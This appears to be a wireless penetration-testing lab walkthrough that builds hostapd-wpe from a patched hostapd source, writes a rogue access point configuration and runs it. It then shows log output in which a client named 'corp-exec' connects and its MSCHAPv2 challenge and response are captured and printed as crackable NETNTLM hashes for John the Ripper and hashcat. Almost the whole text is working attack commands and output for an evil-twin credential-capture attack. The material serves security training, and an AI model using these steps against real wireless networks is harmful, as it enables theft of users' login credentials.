apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends
Download the files
wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
make
make install
make wpe
Creating certs
cd /etc/hostapd-wpe/certs
./bootstrap
make install
Copy and edit the hostapd-wpe config file
nano wpeattackap.conf
# Configuration file for hostapd-wpe
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan3
# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh
# 802.11 Options
ssid=OnDeMaNd-11
channel=1
Execute the script
└─$ sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
[sudo] password for lab:
wlan3: interface state UNINITIALIZED->ENABLED
wlan3: AP-ENABLED
wlan3: INTERFACE-DISABLED
wlan3: INTERFACE-ENABLED
Verify that the SSID is available
Attempt to connect a client to the SSID
└─$ sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
wlan3: interface state UNINITIALIZED->ENABLED
wlan3: AP-ENABLED
wlan3: INTERFACE-DISABLED
wlan3: INTERFACE-ENABLED
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.11: associated
wlan3: CTRL-EVENT-EAP-STARTED 66:dd:3d:13:e8:55
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
mschapv2: Mon Apr 3 19:02:05 2023
username: corp-exec
challenge: a3:a3:e1:0b:2c:6a:23:48
response: eb:ac:bf:00:0c:8a:5b:16:53:4d:0f:e4:48:1f:4b:59:06:f5:69:4c:ae:6a:54:3b
jtr NETNTLM: corp-exec:$NETNTLM$a3a3e10b2c6a2348$ebacbf000c8a5b16534d0fe4481f4b5906f5694cae6a543b
hashcat NETNTLM: corp-exec::::ebacbf000c8a5b16534d0fe4481f4b5906f5694cae6a543b:a3a3e10b2c6a2348
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.1X: Identity received from STA: 'corp-exec'
wlan3: STA 66:dd:3d:13:e8:55 IEEE 802.11: disassociated